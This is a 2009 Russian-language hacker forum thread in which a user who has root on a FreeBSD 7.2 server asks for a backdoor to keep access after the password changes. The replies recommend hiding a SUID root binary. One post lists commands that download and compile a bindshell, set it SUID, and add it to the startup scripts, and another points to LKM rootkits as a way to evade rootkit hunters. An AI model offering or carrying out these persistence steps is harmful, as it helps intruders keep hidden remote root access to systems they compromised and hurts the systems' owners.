Выбор backdoor для FreeBSD 7.2 при наличии root

Discussion in 'Песочница' started by skunk, 22 Jul 2009.

  1. skunk

    skunk New Member

    Joined:
    17 Feb 2008
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток!

    Посоветуйте плз бекдор для сабжевой фри. На данный момент есть рут. Хочу сохранить его на подольше в случае его смены. ;)
     
  2. quasar

    quasar New Member

    Joined:
    20 Jul 2009
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Создай SUID'ник с рутовыми правами и спряч по надежнее. На мой взгляд самый лучший бэкдор )
     
  3. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    1. Сливаем и компилируем bindshell: fetch http://packetstormsecurity.org/advisories/suid/bindshell.c; gcc -o bindshell bindshell.c # если Linux, то сливаем с помощью wget
    2. Ставим на него SUID с рутовыми правами: chmod +s bindshell
    3. Ставим в автозагрузку, создав в папке /usr/local/etc/rc.d/ (FreeBSD), /etc/init.d/ (Linux) скрипт следующего содержания:
    #!/bin/sh
    /tmp/bindshell

    Всё, бэкдор готов =)
     
    #3 InFlame, 24 Jul 2009
    Last edited: 24 Jul 2009
  4. razb

    razb Active Member

    Joined:
    24 Mar 2009
    Messages:
    658
    Likes Received:
    133
    Reputations:
    18
    Обычный суидник палится в первую очередь, даже простым руткит-хантером.
    Ищи что нить с LKM руткитов